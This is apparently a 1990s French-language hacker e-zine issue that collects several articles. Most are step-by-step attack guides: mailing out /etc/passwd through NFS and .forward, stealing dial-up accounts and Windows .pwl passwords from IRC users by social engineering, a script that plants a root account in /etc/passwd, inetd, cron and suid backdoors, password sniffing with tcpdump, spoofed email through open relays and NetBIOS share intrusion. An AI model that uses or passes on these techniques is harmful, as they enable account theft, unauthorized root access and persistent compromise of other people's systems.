hacker, il vous faut de la motivation, le sens de l'initiativeet la capacite à apprendre par vous-même. Alors, c'est le moment ou jamais... (frhack.home.ml.org pour de la documentation) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= * Le code du hackeur * (par les hackeurs en general) Voici un petit complement a la FAQ du hacker, voici le code du hackeur. Il existe des règles partout, le hacking ne fait pas exception à la regle. Bon nous savons que que nous, les hackeurs avont tendance a plutot conterner les loi et les reglements, mais ces regles sont, disons, seulement le resultat du bon sens de la majorite des hackeur de metier. 1) Ne jamais endommager ou detruire un système intentionnellement. 2) Ne jamais envoyer de fichiers destructeurs tels que des trojans, virus, ou des remotes telque " format c: " ou " del *.* " 3) Ne jamais laisser votre vrai nom, adresse, telephone, ou même nick, ils pourraient vous retracer à partir de votre ses informations. 4) Soyez toujours sur vos gardes dans vos conversations. 5) Ne jamais hacker un ordinateur appartenant au gouvernement. 6) Ne jamais dire aux sysop (superviseur) ou à votre professeur que vous êtes un hacker. 7) Hacker pour apprendre, et non pour detruire. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -= Petites annonces =- (par Utopiste) He oui! Nous avons decider d'inclure une partie petite annonce dans notre emag, cepandant comme nous ne desirons pas nous retrouver avec 4 meg de petites annonces, nous allons limiter les annonces au nombre d'une trentaine (Veuillez noter cepandant que toutes les autres annonces seront disponibles via notre site internet (Frhack.home.ml.org) et aussi via notre channel IRC (#hack.fr, undernet) (quand notre bot sera fini) 1) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -= Extraits de conversation =- (par les visiteurs de #hack.fr) Comme nous avons un channel irc assez bien frequente (#hack.fr, undenet) il arrive quelque fois que nous assistons a des conversations vraiment enrichissante mentalement, ou encore moralement decourageante... En passant, pour ce qui est de etre op sur le channel je déteste me faire déranger par qq qui veut un access alors po de /msg utopiste je veux etre op.Nous esperons aussi avoir un bot bientot, avis au programmeur de script qui serait interesser. Maintanant montrons quelque extrait de conversation: .. .. .. (hum ouais, bon changeons d'idee) /msg #hack.fr Bon tout le monde dit un ti mot qui vo etre publier dans le mag ;) marque dans le e-mag : Une des grandes dificultes a ete le decalage horaire * vaToo se demande si utopiste va tenir le choc a la sortie du emag ds kelkes minutes, secondes, dixiemes de secondes... (on avait quelque extrait interessant mais j'doit avoir effacer les log sans faire excipres, tk je vais faire attention pour la fois suivante) =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= * NFS * (Ktulu) Bien sur tout le monde a deja entendu parler du NFS ou Network File System. NFS est un protocole siyué au niveau de la couche application qui permet le partage des fichiers pour des machines reliées au réseau. Ce partage se fait de manière totalement transparente ce qui fait que vous n'avez pas l'impression de travailler sur un fichier dont la source se trouve sur un disque physiquement différent du votre. NFS en quelques mots : NFS fut "inventé" afin de pouvoir mounter des fichiers ou répertoires d'un machine serveur distante à un machine locale. De la même façon qu'on lit une disquette ou un cd sur son pc. Le contrôle d'accés NFS se fait sur l'UID et le GID et non pas sur un loggin ou un password. Afin d'utiliser correctement NFS, il est donc necessaire de posseder les mêmes UID et GID sur les deux machines. Toutes machines peut jouer le rôle de serveur ou de client dans le cas NFS mais bien souvent il n'y a qu'une seule machine qui est désignée comme serveur. Il est une chose interressante a constater avec NFS, c'est que NFS est sans mémoire, c'est à dire : qu'il n'y a pas de mémorisation des opérations successives effectuées par le serveur sur l'état des clients ou sur les transactions de fichiers. Par exemple : l'opération d'ouverture n'est pas memorisée par le serveur mais par le client. Utilisation de NFS : Pour connaitre les fichiers exportés par un serveur utilisez la commande suivante : # showmount -e www.victime.com export list for www.victime.com /usr (evryone) /sbin (everyone) /export/secret (toto) Dans cet exemple, on voit que la machine cible exporte tous les fichiers et sous repertoires de /usr et /sbin en evryone (cad pour tout le monde) alors que seule la machine de toto peut mounter /export/secret (mouahahahahahaha). Pour mounter un système de répertoire sous NFS faites : # mount -t nfs www.victime.com:/usr /temp Et voilà les fichiers et sous répertoires de /usr de www.victime.com se trouve aussi dans votre tmp :p.. ON EN FAIT QUOI ??? Bon, maitenant que vous savez vous servir du NFS, voyons a quoi il peut bien nous servir : 1: deja a inspecter le systeme. N'oubliez pas que la moindre information peut etre cruciale (si le /var est exporte vous pouvez alors facilement recuperer le nom de domaine et donc utiliser NIS pour recuperer les maps passwd). 2: Si le NFS est mal configure, vous pouvez vous faire passer pour le r00t, mais bon c'est rare. ;) 3: vous pouvez surtout avoir un shell sur la machine. :) Souvent il y'a des home directories exportes. Si vous etes chanceux, certains seront 777 (tous le monde peut ecrire dedans :) ), sinon vous devrez prendre l'identite d'un user, en trafiquant votre UID/GID, operation assez facile d'ailleurs. Donc des que vous avez acces a un home directory, mettez lui un fichier .rhosts comprenants "+ +" dedans :) , ou faites un fichier .forward avec "|/bin/mail hacker@fuck.edu.xx < /etc/passwd" histoire de recuperer /etc/password . Ca marche de moins en moins souvent ! c'est une méthode qui a eue son heure de gloire. KthuLu the Windows HuNtEr -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= * COMMENT SE CONNECTER GRATUITEMENT SUR INTERNET? * (jipi) Pour vous connecter à Internet gratuitement, il vous suffit de piquer l'acompte Internet de quelqu'un d'autre. COMMENT? Si cette personne est connecté avec VIDÉOTRON, il vous suffit de récupérer son fichier videotrn.ins ce trouvant dans le répertoir de Windows. Vous allez sur IRC et vous demandez à cette personne de vous envoyer son fichier videotrn.ins, si il est vraiment cave, vous lui demandez simplement de taper: /dcc send votre_pseudo c:\windows\videotrn.ins en lui disant que vous l'avez perdu. (GNARF!) Mais si s'il a un quotient supérieur à 100, il ne voudra pas. Donc, à ce moment vous utiliser des méthode comme *control.exe*. Vous lui dites que vous avez fait un logiciel pour des wav et il serait aimable de le testé blablabla... Pour nous, on veut seulement qui clique dessus (control.exe) :) vous pouvez aussi utiliser la méthode nbtstat (mentionné plus loin). Quand vous avez son vidéotrn.ins, vous n'avez cliquer dessus. Après vous vous rendez dans Poste de travail, Accès réseau à distance, et une nouvelle connection dois être là, pour trouver ce qui se cache derrière les ********* utilisez le logiciel *Revelation v1.1*. Pour ceux qui sont sur INFONIE, vous devez prendre leur fichier infonie.ini ce trouvant le répertoir de windows en utilisant les méthodes que j'ai mentionnées plus haut. Une fois que vous avez le fichier, ouvrez-le avec Note Pad. Ca devrais aficher: [identification] subscription=000000000000000 <- Ça devrait être un numéreau à ..le reste on s'en fou... 15 chiffres. Notez-le! Allez dans poste de travail, Accés réseau à distance et faite une nouvelle connection et appelez là infonie, le numéreau de téléphone pour la France est 0836061317. Dans nom d'utilisateur marquez: inf1/000000000000000@infonie.fr <- Les 000... c'est le numéreau que vous avez notez tentôt Dans mot de passe: (mettez rien, laissez blanc...) Si vous voulez voler l'acompte de quelqu'un qui n'est pas sur vidéotron ni sur infonie. (Ten que cette personne se connecte en dial-up sous Windows95/98/NT) vous pouvez aussi utiliser cette méthode même si la personne est sur Infonie ou sur Vidéotron. Vous n'avez qu'a piquer son fichier *.pwl se trouvant dans le répertoir de Windows et de le décripter avec un logiciel qui décripte les .pwl Le meilleur est *PWL's Hacker* et la commande sous DOS est: pwlhack /list:e le_file.pwl le_login <- Le login est le nom du .pwl. Si le .pwl se nomme RFRASER.pwl donc le login est REFRASER il vous mande le passowrd, vous ne marquez rien et apuyez sur ENTER Ça va écrire plein d'affaires... les dernières affaires c'est ce que l'on veut, ca marque exemple: -[Type]-[The resource location string]--------------[Password]- Url/ winbeta.microsoft.com/winbeta.microsof t.com 326538:tbc6ze9d6hcr3u Dial *Rna\jlepage\jlepage joha3446 Dial *Rna\Videotron Ltee 2\vluxwiei 003169 Url/ NNTP : --------------------------------------------------------------- _ Indexed Entryes: 3; Number of resources: 6. ET CA SORT TOUS LES PASSWORD DE WINDOWS!! * = logiciel, si vous ne les possédez pas, vous pouvez les trouvez sur le site web de hack.fr (www.frhack.org) ou encore me les demander par e-mail, jipi@mail.com =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -= Front page 1998 =- (par opak) La sécu(rité) c'est rien, en abuser c'est...rien aussi. Après : Je fait une fausse manip' sous Front Page 97 et j'efface mon disque dur, voici le dernier venu de la gamme Kro$oft : Billou et ses distributeurs n'ont pas pris de cours sur la sécurité. Je découvris sur le CD-ROM d'un mag' quelconque donc le titre principal était : Une version complète de Front Page 98 Version BETA 2. Et, il s'était glissé comme un petit (mais alors tout petit texte) : A utiliser avant le 1er Janvier 1998. Bref, la version était limitée. Alors j'exploite bien le logiciel et, un (beau) jour, je me décidais a augmenter la date de l'horloge Zindoz en humm… disons 1999. Une question se posait : Y' aura t-il un petit message me résumant le petit texte du CD ou tout simplement le célèbre écran bleu que tout le monde connaît lors de la prochaine exécution ? L'alerte a finalement penché sur le message. Mais attends ! Si je remet la date en 1997 que se pass...Ahhhh ! Horreur, ça remarche ! Voilà pourquoi j'utilise depuis maintenant près de 8 mois Front Page 98 (qui marche très bien a ce jour...) alors que j'ai payé le journal 35 francs et que Front Page 98 coûte 1350 fr. et des poussières, faites le calcul... P.S : Alors SVP, les distributeurs, la prochaine fois, essayez de faire des protections un peu plus sérieuse parce que c'est même pas drôle, on a même plus besoin de déplomber...Merci ! Opak -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ë$$$$$$$$$$$$$$$$$$$$$ë ø ø ø Le sniffing TCP ø ø ø ë$$$$$$$$$$$$$$$$$$$$$ë par Fedaikin Ce petit texte va tenter d'expliquer succintement le format des trames TCP et UDP de fa‡on a comprendre les techniques de sniffing et aussi des programmes tels que les syn floods. Je ne pretend pas vous expliquer totalement le sniffing, mais je vous apporte les bases. Disclaimer : Je ne vous incite pas du tout à utiliser ces renseignements pour pirater un systŠme informatique quel qu'il soit. Ces informations sont donn‚es a titre purement informatif, je veux juste partager avec vous mes connaissances sur les reseaux informatiques. Autre point tres important, l'utilisation de la commande tcpdump est totalement illegale et je ne vous incite pas a l'utiliser. Si vous piratez a l'aide du contenu de ce texte sachez que je ne m'en tient pas responsable. I)A quoi peut bien servir le sniffing? Le sniffing permet de recuperer plein d'infos tres interessantes sans se fatiguer. Atention, tout ce qui suit ne concerne que les reseaux locaux a diffusion du type Ethernet. De plus, cela ne marchera pas lors d'une connection windows(95/nt) car les pass sont cryptes dans ce cas (Et oui on ne peut l'utiliser que sous Linux et des connections Linux).Et bien c'est tout simple, on ecoute ce qui se dit sur le reseau et on s'en sert ;) Je m'explique, dans un reseau les postes discutent(vous suivez ?) et echangent certains trucs tres interressants; notament les PASSWORDS ;) Vous me direz que c'est bien beau mais les pass seront cryptes...Et bien magie des reseaux, NON! NON et RE-NON!!!Et c'est la que c'est marrant, mˆme tres marrant :)) Pour les recuperer, il y a plusieurs methodes: utiliser un sniffer chope sur le ouaibe (lamer), faire son sniffer(plus chaud,mais si bon),ou utiliser un bon tcpdump(on peut l'utiliser pour le prog aussi) Perso j'utilise tcpdump, c'est assez sympa et en plus ca oblige a comprendre. C'est pourquoi je vais vous expliquer le fonctionnement des trames TCP et UDP en detail meme si on ne se servira pas de tout. II)Le format des trames Avant tout, il me faut vous expliquer … quoi ressemblent les trames TCP et les trames UDP. Selon la connection demand‚e, on utilise le protocole de transport TCP ou UDP. Certains utilisent un seul protocole et d'autres melangent les deux. Ainsi un talk se connecte a l'aide de UDP puis transmet les donnees par TCP. Comme on m'a souvent dit un bon schema vaut mieux qu'un long discourt. Je vais donc faire le schema de l'en-tete TCP: ___________________________________________________________________________ /\ | port source (16 bits) | port destination (16 bits) | | |-------------------------------------------------------------------------| | | numero de sequence (32 bits) | | |-------------------------------------------------------------------------| | | numero de d'accuse de reception (32 bits) | 20 | |-------------------------------------------------------------------------| octets| |long d'en-tete | reserve |URG|ACK|PSH|RST|SYN|FIN| taille de la fenetre | | | (4 bits) |(6 bits) | | | | | | | (16 bits) | | |-------------------------------------------------------------------------| | | somme de controle TCP | pointeur urgent | | | (16 bits) | (16 bits) | \/ --------------------------------------------------------------------------- <------------------------------------------------------------------------> 32 bits On a donc une trame de ce type: _________________________ | En-tete TCP| Donn‚es | | 20 octets | 6 … 1460 | ------------------------ N'ayez pas peur je vais vous expliquer tout de suite tous les champs. port source : c'est le port TCP de l'emetteur (pour la reponse). port destination : c'est le port du destinataire. numero de sequence: permet d'identifier le segment TCP. Il est egal au nombre d'octets envoyes. Ils sont aleatoires au debut, puis sont remis … 0 d‚s le 2øechange. num d'accuse de reception : Il indique le numero de sequence de la trame suivante. longueur d'en-tete: donne la longueur de l'en-tete en mots de 32 bits (ici 5).Vous comprenez mieux mon schema hein ;) reserv‚ : aucun interet flag URG (1 bit) : … 1 si le pointeur urgence est en cours d'utilisation. flag ACK " : … 1 si le numero d'accuse de reception est bon. flag PSH " : (PuSHed en english) on ne passe pas par un buffer si … 1 (bof) flag RST " : stoppe la connexion immediatement si … 1. flag SYN " : ahh + interessant.SYN=1 et ACK=0 =>demande de connection SYN=1 et ACK=1 =>confirmation de connection flag FIN " : sert a dire qu'on romp la connexion. taille de la fenetre : donne le nombre d'octets qu'on peut mettre apres l'octet aquitte. somme de controle : controle d'erreur de l'en-tete. pointeur urgence : decalage en octets … partir du numero de sequence courant pointant sur des donn‚es urgentes. Voila, mais ceci dit n'ayez pas peur car la plupart de ces informations ne nous serviront pas a grand chose. Les bits a retenir sont surtout les flags SYN et ACK et la longueur totale de l'entete. Les adresses pourront egalement etre tres utiles ;) En-tete UDP: ___________________________________________________________________________ /\ | port source (16 bits) | port destination (16 bits) | 8 | |-------------------------------------------------------------------------| octets| | longueur | cheksum | \/ |-------------------------------------------------------------------------| <------------------------------------------------------------------------> 32 bits On a donc une trame de ce type: _________________________ | En-tete TCP| Donn‚es | | 8 octets | 0 … 1472 | ------------------------ logueur : longueur en octets du segment UDP(en-tete+donnees). cheksum : code de controle de l'en-tete III)Deroulement de la connection Maintenant passons a la connexion en elle meme. Il y a donc deux protocoles a surveiller: TCP et UDP. Vous allez me dire lequel regarder? Et bien malheureusement on ne peut pas le savoir a l'avance car chaque application a un deroulement specifique. Par exemple un talk se connecte d'abord en UDP puis passe en TCP. Donc la il faudra capter les deux au debut et par la suite ... Connection TCP: Il y a tout d'abord trois trames qui servent a la connexion a proprement parler. La premiere est envoyee par le client au serveur. Dans cette trame(et c'est la qu'on voit ceux qui on suivi jusqu'ici :)) le flag SYN a 1 et tous les autres a 0; on a ici une demande de connexion. La deuxieme (serveur => client) a les flags SYN et ACK a 1; ce qui correspond … une confirmation de connection. La troisieme (client => serveur) a le bit ACK a 1 et les autres a 0. On est connecte. C'est la que s'expliquent les syn flood. On envoi plein de trames avec une demande de connection d'une machine dont on a spoofe l'adresse et la machine destinataire renverra un tas de trame de confirmation, jusqu'a ce que la machine qui lui a envoye la demande lui reponde (ce qui ne se passera jamais mouahahahahah). La machine cible se trouve donc fortement ralentie ;) Connection UDP: Elle se passe en quatres etapes. La premiere trame est envoyee par le client au server pour faire la demande de connection. La deuxieme est la reponse du server au client pour la demande de connection. La troisieme (client => server) est pour une sorte de deuxieme demande de connection. La quatrieme (server => client) est pour la confirmation de connection finale. La communication est etablie, et les infos interressantes commencent :) IV)La commande TCPDUMP Donc maintenant que vous savez comment fonctionnent les trames TCP et UDP, il vous faut savoir comment les chopper. La encore il y a plusieurs solutions (comme je l'ai dit au debut): utiliser un sniffer choppe sur le ouaibe se faire le sniffer ou utiliser la commande tcpdump La commande tcpdump est une commande linux qui capture les trames d'un type precis (TCP/UDP...). Je vais donc vous expliquer les options de cette commande. Pour ecouter une connection TCP par exemple entre la machine neuneu et son server, on tapera la commande suivante: tcpdump -i eth0 host neuneu and host server and tcp Je commante : le -i eth0 est une option qui capture les trames sur l'interface eth0(ethernet) host donne les deux machines entre lequelles on ecoute tcp pour preciser qu'on veut les trames TCP (on peut remplacer par UDP) on peut ajouter un port precis en tapant "and port numero" ou "and port ftp" Options de tcpdump: -e : affiche l'en-tete de la couche liaison de donn‚es -t : evite d'afficher l'heure d'arriv‚e des trames -i bla : capture les trames sur l'interface bla -s nbr : affiche les nbr premiers octets -vv : affiche beaucoups d'informations sur la trame (trop pour nous) -x : affiche la trame en hexadecimal(sauf l'en-tete de la couche liaison de donn‚es) Filtres : Ils faut preciser le protocole a ecouter : arp, icmp, tcp, udp, ip Si vous voulez ecouter plusieurs machines tapez : host neuneu1, host neuneu2 and host server Vous pouvez egalement placer les adresses ip des machines au lieu de leur noms. Vous pouvez encore restreindre l'ecoute a un(ou plusieurs) port special:port 23, port ftp and port www. Voila, pour realiser votre sniffer, vous pouvez ecrire un script shell qui execute la commande tcpdump avec une redirection et qui sera lance par le .profile (un conseil cachez le prog). Ou sinon vous pouvez lancer la commande comme ca depuis votre propre PC en esperant qu'il y ait une connection au moment ou vous ecoutez. Il est vrai qu'il existe des methodes pour faire des programmes en C ou autre; mais ceci donnera lieu a un autre texte(et oui vous entendrez encore parler de moi ;)) V)Annexe Il y a tout de mˆme un remede a cette ecoute clandestine(et mˆme deux). On peut utiliser des bridges au lieu d'utiliser des hubs; on ne sera plus en mode diffusion(il y a une connection directe physique entre les machines) mais on fait croire qu'on diffuse encore a tout le monde. On ne peut plus sniffer. On peut aussi utiliser SSH au lieu d'utiliser telnet. SSh est beaucoup plus securise car il crypte les pass. J'ai fini, et si vous avez des questions (ou des commantaires) vous pouvez me mailer a cette adresse: fedaikin@altern.org Ou vous pouvez me retrouver sur les servers irc undernet. Je tient a dire un grand merci a BuBle (a qui je doit beaucoups et qui est un bon pote),un grand a KthuLu aussi. Je remercie aussi toute l'equipe de frhack et je passe un enorme bonjour a tous mes potes de #hack.fr fedaikin@altern.org -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=- -= Back door unix =- (par buble) Ce petit texte ne se pr‚tend pas exhaustif bien au contraire, mais propose seulement d'expliquer quelques BackDoor. 1/ L'ajout d'un compte avec l'UID … 0 C'est ‚videmment la maniŠre la plus simple mais aussi la moins efficace : la modification est flagrante. De plus le fichier passwd est une des premiŠre chose que l'admin va regarder s'il pense ˆtre victime d'une attaque. N‚anmoins il peut ˆtre pratique de la connaŒtre. Avant de rajouter un acompte, lister le fichier passwd pour voir comment les champs de commentaires sont remplis. Voici ci-dessous un script permettant de rajouter un acompte au milieu du fichier passwd # Ajoute #!/bin/csh # Inserts a UID 0 account into the middle of the passwd file. set linecount = `wc -l < /etc/passwd` # Compte le nombre de lignes cd # Retourne dans le Home directorie cp /etc/passwd ./temppass # Copie le fichier passwd dans un fichier temporaire echo passwd file has $linecount[1] lines. # Dis le nombre de ligne du fichier passwd @ linecount[1] /= 2 @ linecount[1] += 1 # we only want 2 temp files echo Creating two files, $linecount[1] lines each \(or approximately that\). split -$linecount[1] ./temppass # passwd string optional echo "dupond::0:0:etudiant 1 ann‚e/:/bin/bash" >> ./xaa # A remplir en fonction des ligne de /etc/passwd cat ./xab >> ./xaa mv ./xaa /etc/passwd chmod 644 /etc/passwd # or whatever it was beforehand rm ./xa* ./temppass echo Done... Note: NE CHANGEZ JAMAIS LE MOT DE PASSE DU ROOT ! Note': Sur certains OS, tels que SUN OS, il est impossible pour un utilisateur ayant son UID … 0 de se connecter … distance, il faut donc se connecter en tant qu'utilisateur normal puis faire un su utilisateur_root. Dans le mˆme ordre d'id‚e vous pouvez d‚verrouillez un acompte d'administration tel que Synk qui possŠde un uid a 0 ou en encore un compte verrouill‚ depuis longtemps. Pour ce faire, retirez simplement le caractŠre '*' du 2eme champs Note: sur certains systŠmes Unix, l'ajout d'un caractŠre quelconque dans le champ UID d'un utilisateur, met l'UID de cette personne … 0. 2/ Rajout d'un service Une autre m‚thode est souvent bien plus efficace, elle consiste … rajouter un service qui pourra ex‚cuter … distance, par un telnet sur le port cr‚e … cet effet, un script shell effectuant la/les commande(s) souhait‚e(s). Mais tout d'abord je vais expliquer 2 fichiers: /etc/services et /etc/inetd.conf. /etc/services est le fichier qui fait le lien entre les ports de la couche transport et les services correspondants, exemple : ftp 21/tcp file tranfert protocol (1) (2)/(3) (4) Le champs (1) repr‚sente le nom du service il fait le lien avec le champ (1) de /etc/inetd.conf. Le champ (2) est le num‚ro de port allou‚. Le champs (3) est le protocole de la couche transport utilis‚. Le champs (4) est r‚serv‚ au commentaire. /etc/inetd.conf est le fichier permettant de configurer le d‚mon inetd qui est le d‚mon qui prend en charge les d‚mons tels que in.ftpd ou in.telnetd. Ce fichier est pr‚sent‚ de la maniŠre suivante. ftp stream tcp nowait root /usr/sbin/in.ftpd (1) (2) (3) (4) (5) (6) (7) Le champ (1) repr‚sente le service, il doit ˆtre pareil au champs (1) de /etc/services. Le champs (2) est le type de paquet envoy‚ : Si le protocole est TCP ce sera des trames si c'est UDP se sera des datagrammes. Le champs (3) est le protocole utilise. Le champs (4) est je sais pas quoi. Le champs (5) est avec quel UID est lanc‚ le d‚mon. Le champs (6) est l'emplacement sur la machine du d‚mon. Le champ (7) permet de donner les option avec lesquels le d‚mon sera lanc‚, dans cet exemple le d‚mon est lanc‚ sans options suppl‚mentaires. La m‚thode consiste donc a modifier les deux fichiers pr‚sent‚s ci-dessus afin de pouvoir ex‚cuter un script shell ou un programme C … distance. Le programme peut par exemple rajouter une ligne dans /etc/passwd ou bien un "+ +" dans le rhosts du root. La limite du programme est celle de votre imagination. Exemple: Ajouter la ligne suivante dans /etc/services: evil 666/tcp root of all evil Ajouter la ligne suivante dans /etc/inetd.conf: evil stream tcp nowait root /usr/sbin/in.yepd Cr‚er le script shell suivant, appelez le in.yepd, mettez les droits d'ex‚cution du script, et mettez le dans /usr/sbin/ #!/bin/sh #Ce script permet de se faire envoyer un xterm xterm -display votre_addresse_ip:0 & #Ce script ne marche ‚videmment que si vous avez une adresse IP fixe 3/ Par le sendmail Cette m‚thode est bas‚e sur les fonctionnalit‚s de r‚emission du courrier electronique, notamment grƒce au fichier .forward. Ce fichier permet de r‚exp‚dier du courrier destin‚ a quelqu'un vers une autre boite au lettre ‚lectronique. De plus Ce fichier peut aussi ex‚cuter des commandes lorsque l'utilisateur re‡oit un mail. Ce fichier doit ˆtre mis dans le home directorie pour b‚n‚ficier de ses fonctionnalit‚s. Exemple de .forward ( appartient a reagan@rigoler.com) coolspot@7up.com wistiti@fbi.com "|/bin/ping -l 1 whitehouse.gov" Quand un mail est envoy‚ … reagan, il est renvoy‚ automatiquement a coolspot chez 7up.com, et a wistiti a fbi.com. De plus, un ping est effectu‚ sur la maison blanche. Une autre m‚thode dans un mˆme ordre d'id‚e est de rajouter une ligne dans /etc/aliases qui ex‚cutera un script shell exemple: evil: "|/ma/commande" ainsi quand un mail sera envoy‚ a evil, /ma/commande sera ex‚cut‚. Note: je n'ai pas r‚ussi a cr‚er des backdoor sendmail sous linux red hat 5.0. Si quelqu'un sait comment faire qu'il me mail … BuBle@caramail.com 4/ Les crontabs Le d‚mon cron est un d‚mon permettant d'ex‚cuter des commandes … intervalles r‚gulier. Il se configure par chaque utilisateur. Pour ajouter un service utilisant crond, il faut ‚diter le fichier /var/spool/crontab/nom_d'utilisateur ayant la forme suivante: 5 15 * * * /bin/pti_programme (1) (2) (3) (4) (5) (6) Les cinq premiers champs permettent de r‚gler le moment ou la commande est lanc‚, le 6eme champs est la commande a effectuer. Le champs 1 correspond au minutes(de 0 a 59) Le champs 2 correspond au heures(de 0 a 23) Le champs 3 correspond au jour du mois(de 1 a 31) Le champs 4 correspond au mois de l'ann‚e(de 1 a 12) Le champs 5 correspond au jour de la semaine(de 0 a 6. le 0 est le dimanche) Donc dans l'exemple ci-dessus, pti_programme est lanc‚ … 15h 5min tous les jours La technique consiste donc a rajouter une crontab qui v‚rifiera par exemple si a ligne mise dans /etc/passwd est toujours pr‚sente: #!/bin/sh # Ce scripte permet de remettre une ligne dans /etc/passwd if !(grep dupond::0:0:etudiant 1 annee:/:/bin/bash /etc/passwd > /dev/null) ; then # La ligne est non pr‚sente /tmp/ajoute 2>/dev/null else # La ligne est pr‚sente exit 0 fi 5/ Trafiquer un programme La c clair il faut r‚cup‚rer les sources d'un programme qui doit obligatoirement avoir le bit suid, tel que login ou ... et rajouter un bout de programme du style: si l'argument 1 est truc alors { met l'uid a 0 met le gid a 0 lance un shell } quand le programme sera lanc‚ avec l'argument truc, le prog te passe root. Note cette technique n‚cessite d'avoir d‚j… un accŠs normal au systŠme. 6/ La modification du d‚mon telnet Dans ce cas, il faut r‚cup‚rer la source du d‚mon telnet utilis‚ par cible.com et la modifier de telle maniŠre que lorsque l'on demande un login, on rentre une certaine variable ex‚cutant directement une session telnet. Je ne me suis pas trop pench‚ sur la maniŠre de coder ce type de backdoor, mais sachez que c'est, je pense un des meilleur types de backdoor possibles. Il existe encore d'autres type de backdoor notamment certaines allant modifier la valeur des registres m‚moires du systŠme mais je ne les ai pas pour l'instant ‚tudi‚s. Voil… ce premier texte sur les backdoors ‚crit par mes soins est finis si vous avez des question, commentaires, correction, ou informations suppl‚mentaires, vous pouvez m'envoyer un mail a BuBle@altern.org ou me retrouver sur #hack.fr sur le r‚seau Undernet. Remerciements: Je tient a remerci‚ ici Cleb, qui ma ouvert la voie quand j'‚tais franchement un d‚butant, je tient a saluer ici aussi mes potes: Xi9, Kthulu, les membres de hack.fr et tous les gens qui vont sur #hack.fr. BuBle@altern.org -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -= email anonyme =- (par Utopiste) Bon, j'sais c'est pas mal newbie comme mais comme j'en ai un peu marre que le monde utilise des anonymous mailer sans vraiment savoir comment ca fonctionne, decider d'expliquer les principes de bases, possiblement que je ferai la meme chose pour mirc via telnet dans le prochain # de frhack zines. Marche à suivre: * Demarrarer son client Telnet favori () et se connecter sur un serveur mail sur le port 25 (c:\Windows\Telnet.exe collanaud.qc.ca 25) * Une ligne ressemblant a ceci est suppose apparaître: * Ensuite inscrivez ceci : HELO UnServeurAnonymous.com MAIL FROM:VotreNick@CeQueVousVoulez.com RCPT TO:Admin@Compagnie.Polluante.com DATA subject: Survie de notre planète Quand aller vous arrèter de polluez notre planète !!!! . QUIT (Certain serveur mail note l'adresse IP, alors ils est toujours prudent de passer par une passerelle pour eviter d'être retraçable...) (Avant d'innonder le net de vos messages, envoyer en dont un à vous, question de verifier si ca fonctionne bien) (Si ça fonctionne, n'hesiter pas à envoyer des messages à tous les site raciste ou de pédophilie ou encore a mikro$oft ou les hell canada) (Pour plus d'information, veuillez lire le RFC822) En prime, voici la liste des serveurs mail anonymous (si un serveur ne repond pas ou est hors d'usage veuillez me communiquer un message question que je remettre ma liste à jour...) mcl.ucsb.edu pentagon.mil unix.newnorth.net wam.umd.edu mail2.sas.upenn.edu cps1.starwell.com -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -= L'exploit NetBios =- (par Sice et traduit par vaToO) Ok, on ne peut pas parler d'exploit ici, il s'agit avant tout d'une mauvaise config sur la machine sur laquelle vous allez vous connecter. Mais avant d'aller plus loin dans cette methode, je tiens a remercier Ph@ntom, Utopiste, [mob], Smokey et Cyberjunk sans lesquels cet article n'aurait pu se faire. Un petit mot sur l'exploit en lui-meme. Avec cet exploit vous aurez la possibilite de vous connecter sur une machine qui fait tourner windows (3.11, 95, 98 ou encore NT) ainsi que le client pour reseaux microsoft avec le partage de fichiers et d'imprimantes active. Cela ne fonctionne donc pas avec toutes les machines. Pour vous entrainer afin de bien comprendre la methode, je vous conseille #windows95 afin de trouver des "victimes", cependant si vous souhaitez VRAIMENT en apprendre d'avantage sur cette technique n'oublier pas que vous pouvez le faire en "loop-back" (127.0.0.1). Maintenant, il faut tout d'abord vous assurer que vous avez sur votre bureau l'icone voisinage reseaux (Network Neighborhood). Si ce n'est pas le cas, vous devez ajouter, dans le Panneau de Configuration / Reseaux, le client pour reseaux microsoft. Des bruits courent racontant que vous auriez besoin, pour cet exploit, du NetBEUI, ils n'ont absolument aucun fondements. Si vous avez des problemes autres que ceux decrit plus loin dans ce fichier, considerer la necessite de desinstaller puis reinstaller le client microsoft, le dialup et/ou le protocole tcp/ip. Bon maintenant choisir sa victime... comme je vous l'ai dit plus haut #windows95 est un bon channel pour commencer. Vous pouvez egalement essayer sur des sites web. J'espere ne surprendre personne en disant que pour connaitre l'ip de quelqu'un sur irc, il faut taper: "/DNS nickname". Ouvrez une session Dos, la commande suivante va nous permettre de savoir si la personne fait tourner le partage de fichiers: ;--- Session DOS --- C:\WINDOWS>nbtstat -A addresse_ip NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------- USERNAME <00> UNIQUE Registered WORKGROUP <00> GROUP Registered USERNAME <03> UNIQUE Registered USERNAME <20> UNIQUE Registered 